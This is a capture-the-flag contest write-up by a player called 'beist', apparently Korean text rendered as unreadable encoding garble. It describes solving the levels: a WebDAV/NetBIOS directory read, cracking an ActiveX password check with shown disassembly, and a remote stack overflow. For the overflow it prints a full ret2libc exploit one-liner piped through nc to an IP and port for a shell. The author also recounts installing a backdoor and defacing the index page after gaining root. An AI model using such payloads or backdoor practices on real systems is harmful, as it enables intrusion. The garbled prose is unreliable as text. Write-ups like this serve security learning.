¾È³çÇϼ¼¿ä? beist ÀÔ´Ï´Ù. ¸ÕÀú ´ëȸ¸¦ ÁÖÃÖÇØÁֽŠ´ë´ö ´ëÇаú ±×¸®°í, ¹®Á¦¸¦ ¸¸µå½Ã°í °ü¸®ÇÏ´À¶ó °í»ýÇϽŠÇØÄ¿½º·¦¿¡°Ôµµ °¨»çÀÇ ¸»¾¸µå¸³´Ï´Ù. À۳⿡ À̾ ¿ÃÇØ¿¡µµ ¿îÀÌ ÁÁ°Ô ÁÁÀº ¼ºÀûÀ» °ÅµÎ°Ô µÇ¾ú½À´Ï´Ù. ÀÔ»óÀÚ°¡ ±â¼ú ¹®¼­¸¦ ÀÛ¼ºÇÏÁö ¾Ê¾Æµµ µÇ´Â ´ëȸ¶ó ¸¹Àº Âü°¡ÀںеéÀÌ ¹®Á¦ÀÇ Ç®À̹ýÀ» ±Ã±ÝÇÏ°Ô »ý°¢ÇÒ °Í °°¾Æ¼­ ÀÌ·¸°Ô °£´ÜÇÏ°Ô³ª¸¶ Ç®À̹ýÀ» ¿Ã¸³´Ï´Ù. ·¹º§ 1 Àº ¿©·¯ °¡Áö ¹æ¹ýÀÌ ÀÖ´Ù°í ÇÕ´Ï´Ù. netbios ¿Í webdav µîÀ» ÀÌ¿ëÇؼ­ (±× ÀÌ¿Ü¿¡µµ ´õ ÀÖÀ»Áö ¸ð¸¨´Ï´Ù.) Ç® ¼ö ÀÖ½À´Ï´Ù. \\level1 ¿Í °°Àº ¹æ½ÄÀ¸·Î µé¾î°¥¼öµµ ÀÖ°í, webdav Client ¸¦ ÀÌ¿ëÇÏ¿© level1 ÀÇ webdav ¿¡ Á¢¼ÓÇÏ¿© ƯÁ¤ µð·ºÅ丮ÀÇ ³»¿ëÀ» º¼ ¼ö ÀÖ¾ú½À´Ï´Ù. ¿©±â¼­´Â level1 µð·ºÅ丮¸¦ º¸´Â °ÍÀÌ ¹®Á¦ÀÇ °ü°ÇÀε¥, µð·ºÅ丮 ¾ÈÀ» º¸°Ô µÇ¸é level2 ·Î ÀÎÁõÇÒ ¼ö ÀÖ´Â Æнº¿öµå ÆÄÀÏÀÌ ´ã°ÜÀֱ⠶§¹®ÀÔ´Ï´Ù. Æнº¿öµå ÆÄÀÏÀ» ÀÐ°í ´ÙÀ½ ·¹º§·Î ÀÎÁõÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù. ·¹º§ 2 ´Â Windows ¾îÇø®ÄÉÀÌ¼Ç Crack ¹®Á¦ÀÔ´Ï´Ù. ActiveX ·Î µÈ ¹ÙÀ̳ʸ®¸¦ Crack ÇÏ´Â ¹®Á¦ÀÔ´Ï´Ù. ¸¹Àº ºÐµéÀÌ ¿©±â¼­ °í»ýÀ» ÇϽŠ°Í °°½À´Ï´Ù. Àú´Â W32Dasm À¸·Î µð½º¾î¼ÀÀ» ÇÏ°í, ¼ÒÇÁÆ® ¾ÆÀ̽º¸¦ ÀÌ¿ëÇÏ¿© ¹®Á¦¸¦ Ç®¾ú½À´Ï´Ù. Crack Àº ¿©·¯ °¡Áö ¹æ¹ýÀ¸·Î ÇÒ ¼ö Àִµ¥, Àú´Â ¾ÏÈ£¸¦ ºñ±³ÇÏ´Â ·çƾ ¾Õ¿¡¼­ ÇÁ·Î±×·¥À» ¸ØÃß°í, °¢ ·¹Áö½ºÅÍ¿¡ ¹«½¼ °ªÀÌ µé¾îÀÖ´ÂÁö È®ÀÎÇÏ´Â ¹æ¹ýÀ¸·Î Ç®¾ú½À´Ï´Ù. ¿©±â¼­ Áß¿äÇÑ Á¡Àº, ¾ÏÈ£¸¦ ºñ±³ÇÏ´Â ºÎºÐÀ» Á¤È®È÷ ã¾Æ°¡´Â ¹æ¹ý Àä, ¸¹Àº ºÐµéÀÌ mov eax, dword ptr[ebp-20] mov edx, 0046D1E4 call 0040475c jne 0046d189 ÀÌ °÷À» ¾ÏÈ£ ºñ±³ ·çƾÀ¸·Î »ý°¢Çϼż­ °í»ýÀ» ÇÏ½Å°Í °°Àºµ¥, ÀÌ ºÎºÐÀº ¾ÏÈ£ ºñ±³ ¹®ÀÌ ¾Æ´Ï¶ó »ç¿ëÀÚ°¡ ÀÔ·ÂÇÑ ID °¡ admin ÀÎÁö ¸Â´ÂÁö È®ÀÎÇÏ´Â ºÎºÐÀÔ´Ï´Ù. (ÁÖ¼Ò °ªÀº »ó´ë°ªÀ̶ó ´Ù¸¥ ºÐµé ÄÄÇ»ÅÍ¿¡¼± ´Ù¸£°Ô ³ª¿Ã ¼ö ÀÖ½À´Ï´Ù.) ½ÇÁ¦·Î 0046d189 ·çƾÀ» »ìÆ캸¸é no such a user ¸Þ¼¼Áö¸¦ Ãâ·ÂÇÏ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. ¾ÏÈ£¸¦ ºñ±³ÇÏ´Â °÷Àº À§ ·çƾÀÇ ¹Ø¿¡ ÀÖ´Â mov eax, dword ptr[ebp-24] mov edx, dword ptr[ebp-0c] call 0040475c jne 0046d17d ÀÌ °÷ÀÔ´Ï´Ù. ¿©±â¼­ step À» ÁøÇàÇϸ鼭 call ¾Õ¿¡¼­ Ä¿¼­¸¦ ¸ÂÃá ÈÄ, d eax ³ª d edx µîÀ¸·Î °ªÀ» È®ÀÎÇÏ¸é ¾ÏÈ£¸¦ º¼ ¼ö ÀÖ½À´Ï´Ù. (jne ºÎºÐÀ» no operation µîÀ» ó¸®ÇÑ ÆÐÄ¡´Â ¼Ò¿ëÀÌ ¾ø½À´Ï´Ù. ¿Ö³ÄÇÏ¸é ¾ÏÈ£¸¦ ¾Ë¾Æ³»¾ß ´ÙÀ½ ·¹º§À» ÀÎÁõÇÒ ¼ö Àֱ⠶§¹®ÀÔ´Ï´Ù.) level3 Àº ÀϹÝÀûÀÎ remote overflow ¹®Á¦ÀÔ´Ï´Ù. ¹®Á¦´Â ·£´ý ½ºÅÃÀÔ´Ï´Ù. Àú´Â À̶§ ¼±µÎ¸¦ ´Þ¸®°í ÀÖ¾ú´Âµ¥ ÀÌ »óȲ¿¡¼­ ·£´ý ½ºÅÃÀ» °¡Àå »¡¸® ±ý ¼ö ÀÖ´Â ¹æ¹ýÀº ¹¹´Ï¹¹´Ï Çصµ brute force ÀÔ´Ï´Ù. ·£´ý ½ºÅÃÀ̶ó°í ÇغÃÀÚ ¿ø·¡ ½ºÅà ÀÚüÀÇ Å©±â°¡ ±¤¹üÀ§ÇÏ°Ô Å« °ÍÀÌ ¾Æ´Ï±â ¶§¹®ÀÔ´Ï´Ù. Oneshot(Á¦°¡ ÀÓÀÇ·Î ºÙ¿´½À´Ï´Ù.) exploit À» ¸¸µå´Â °ÍÀº ÀÏ´Ü ·¹º§À» ±ú°í ³ª¼­ ÀÎÁõÀ» ÇÑ ÈÄ¿¡, ¸¸µå´Â °Íµµ ´ÊÁö ¾Ê´Ù°í »ý°¢Çß½À´Ï´Ù. ¾î·°Å³ª ¼Ò½º¸¦ ºÐ¼®ÇÏ°í °ø°ÝÇؾßÇÒ ¹öÆÛ¸¦ º¸´Ï±î ´ÙÀ½°ú °°ÀÌ ÇÏ¸é µÇ°Ú´õ±º¿ä. [LOGR ]+[86¹ÙÀÌÆ®NOP]+[24¹ÙÀÌÆ®Shellcode]+[4¹ÙÀÌÆ®Returnaddress] ·£´ý ½ºÅÃÀÌÁö¸¸ brute force À߸¸Çϸé 1 ºÐ³»¿¡ ½© ¶³¾îÁý´Ï´Ù. ½©À» ¾òÀ¸¸é µð·ºÅ丮¿¡ ·¹º§3 À» ÀÎÁõÇÒ ¼ö ÀÖ´Â ÆÄÀÏÀÌ º¸ÀÌ°í, ±× ÆÄÀÏÀ» ÀÌ¿ëÇÏ¿© ÀÎÁõÀ» ÇÏ¸é µË´Ï´Ù. Oneshot Exploit Àº RTL ±â¹ýÀ» ÀÌ¿ëÇؼ­ ½±°Ô © ¼ö ÀÖ½À´Ï´Ù. ¼­¹ö ³»¿¡¼­ Á¶»çÇÑ °¢ °ªµéÀÔ´Ï´Ù. System = 0x4203f2c0 /bin/sh = 0x42127ea4 ÀÌ °ÍÀ» ÀÌ¿ëÇÏ¿© °ø°Ý ¸í·É¾î¸¦ »ìÆ캸¸é (perl -e 'print "LOGR ", "\x90"x110, "\xc0\xf2\x03\x42"x1,"\xa4\x7e\x12\x42"x2';cat)|nc 203.235.27.250 5888 [LOGR ]+[110¹ÙÀÌÆ®NOP]+[4¹ÙÀÌÆ®SYSTEMÁÖ¼Ò]+[4¹ÙÀÌÆ®Dummy]+[4¹ÙÀÌÆ®/bin/shÁÖ¼Ò] À§¿Í °°½À´Ï´Ù. Ä¿³ÎÀÌ ÄÄÆÄÀϵɶ§ ¸ÅÇεǴ ÁÖ¼ÒÀ̹ǷΠ½Ã½ºÅÛÀÌ DoS ·Î ÀÎÇØ ´Ù¿îµÇ¾î ´Ù½Ã ºÎÆõȴٰí ÇÏ´õ¶óµµ, À§ ¸í·É¾î ÇѹøÀ̸é brute force °ø°ÝÀÌ ÇÊ¿ä ¾øÀÌ Oneshot ¿¡ level3 shell À» ¾òÀ» ¼ö ÀÖ½À´Ï´Ù. level3 À» °¡Àå ¸ÕÀú ±ú°í ³ª¼­ ¼­¹ö¸¦ »ìÆìºÃ½À´Ï´Ù. Ȥ½Ã³ª Ä¿³Î ¹ö±×°¡ ÀÖÀ»±î? ¶ó°í ÀǾÆÇϸ鼭 exploit À» µ¹·Áº¸´Ï ¹ö±×°¡ ÀÖ´õ±º¿ä. (¹«ºÐº°ÇÑ index ¸Ô±â¸¦ ¸·±â À§Çؼ­ ÁÖÃÖÃø¿¡¼­ ÀϺη¯ ¹è·ÁÇØÁÖ½Å°Í °°½À´Ï´Ù.) root ¸¦ µû°í ´Ù¸¥ »ç¶÷ÀÌ root ¸¦ µû´Â °ÍÀ» ¸·±â À§ÇØ, Ä¿³Î ÆÐÄ¡¿Í ¹éµµ¾î ¼³Ä¡µî ±âŸ ¿©·¯ °¡Áö ÀÛ¾÷µéÀ» ÇÏ¿´½À´Ï´Ù. index ¸¦ "Welcome to beist World. Sejong JJang." À¸·Î ¹Ù²Ù°í ÃÊÁ¶ÇÑ ¸¶À½À¸·Î ¼­¹ö¸¦ ÁöÄѺ¸±â ½ÃÀÛÇß½À´Ï´Ù. ´ëȸ Á¾·á±îÁö Ưº°ÇÑ ÀÏÀº ¾ø¾ú½À´Ï´Ù. ´ëȸ Á¾·á ½Ã°¢ 5 ºÐ Àü¿¡ ¾Ë¶÷ÀÌ ¿ï¸®µµ·Ï ¸ÂÃß°í ´ëȸ Á¾·á 25 ºÐ Àü¿¡ ÀáÀÌ µé¾ú½À´Ï´Ù. ±×·¯´Ù.. 12 ½Ã 12 ºÐ¿¡ ´ë´ö ´ëÇÐ À¸·ÎºÎÅÍ ÀÔ»óÀÚ ¾Ë¸² ÀüÈ­¸¦ ¹Þ¾Ò½À´Ï´Ù. ¾Ë¶÷À» ¸ø µè°í ÀÚ¹ö¸° °ÍÀÌÁÒ.. ÇÏÇÏ ´ÙÇàÀ̵µ Root ¸¦ ȹµæÇÑ Âü°¡ÀÚ°¡ ¾ø¾î¼­ 1 µîÀ» Áöų ¼ö ÀÖ¾ú½À´Ï´Ù. À̹ø ´ëȸ´Â Àú¿¡°Ô ¿îÀÌ ÀÖ¾î À¯¸®Çß´ø ´ëȸ¿´´ø°Í °°½À´Ï´Ù. Àú´Â ¿ø·¡ Windows Crack À» ¾Ë°í ÀÖ´ø »óÅ¿´±â ¶§¹®¿¡ level2 ¸¦ ±Ý¹æ Ç® ¼ö ÀÖ¾ú½À´Ï´Ù. ¸®´ª½º¿¡¼­ ½Ã½ºÅÛ ÇØÅ·ÇÒ ¶§ µð½º¾î¼ÀÀ» ¸¹ÀÌÇÏ´Â ´Ù¸¥ ÇØÄ¿ºÐµéµµ, À©µµ¿ì Crack ¿¡ ´ëÇؼ­ Á¶±Ý¸¸ ¾Ë°í °è¼Ì´Ù¸é ½±°Ô ÇϽǼö ÀÖÀ¸¼ÌÀ»°Å¶ó »ý°¢ÇÕ´Ï´Ù. ¿©´ãÀ¸·Î, À̹ø ´ëȸ´Â »óÀåÀÌ À۳⺸´Ù ÁÁ¾ÆÁ³´õ¶ó°í¿ä. »óÀ» ¹Þ±â À§Çؼ­ ´ëȸ ¿­¸®±â ÀüºÎÅÍ Æò¼Òº¸´Ù ´õ ¸¹ÀÌ °øºÎÇߴµ¥ (°øºÎÇß´ø °ÍÀº ¾È³ª¿ÔÁö¸¸) ±× ´öÀÎÁö ÁÁÀº ¼ºÀû °ÅµÎ°Ô µÈ °Í °°½À´Ï´Ù. 00:00~10:00 ½Ã±îÁö ´ëȸ¿¡ Âü°¡¸¦ ÇÏ´Ù°¡, 10:00~15:00 ±îÁö ÀÚ°í ³ª¸ÓÁö ½Ã°£¿¡ ¶Ç ´ëȸ¿¡ Âü°¡Çß½À´Ï´Ù. ±×¸®°í ÇÏ·ç ±Ý¿äÀϺÎÅÍ ¿ù¿äÀÏ »õº® Áö±Ý±îÁö Áý¿¡ ¾É¾Æ¼­ ÇÇÀÚ¸¸ ¸Ô°í »ýÈ°Ç߳׿ä. ÇÏÇÏ ´Ù¸¥ ÀÔ»óÀںе鿡°Ôµµ ÃàÇÏÀÇ ¸»¾¸µå¸®°í ½Í½À´Ï´Ù. ¿ì¸® Çб³´Â ÇØÅ· ´ëȸ¿¡ °ü·ÃµÈ ÀåÇбÝÀÌ ¾ø¾î¼­ ½½ÇÁ³×¿ä. µÎ¼­ ¾ø´Â ±Û ³Ê±×·¯¿î ¸¶À½À¸·Î ºÁÁֽðí¿ä. ±×·³ ¸ðµÎ ÁÁÀº ¹ã µÇ½Ã°í¿ä.. ¹ú½á ½Ã°£ÀÌ ¸¹ÀÌ ´Ê¾ú³×¿ä. Áö±Ý TV ¿¡¼­ ¹ÂÁö¼Ç À̶ó´Â ÇÁ·Î±×·¥¿¡, ¸¹Àº °¡¼öµéÀÌ ¸ð¿© ÆòÈ­¿¡ ´ëÇÑ ³ë·¡¸¦ ºÎ¸£°í Àֳ׿ä. ÇÏÇÏ ¼¼°è ÆòÈ­¸¦ ±â¿øÇϸç!!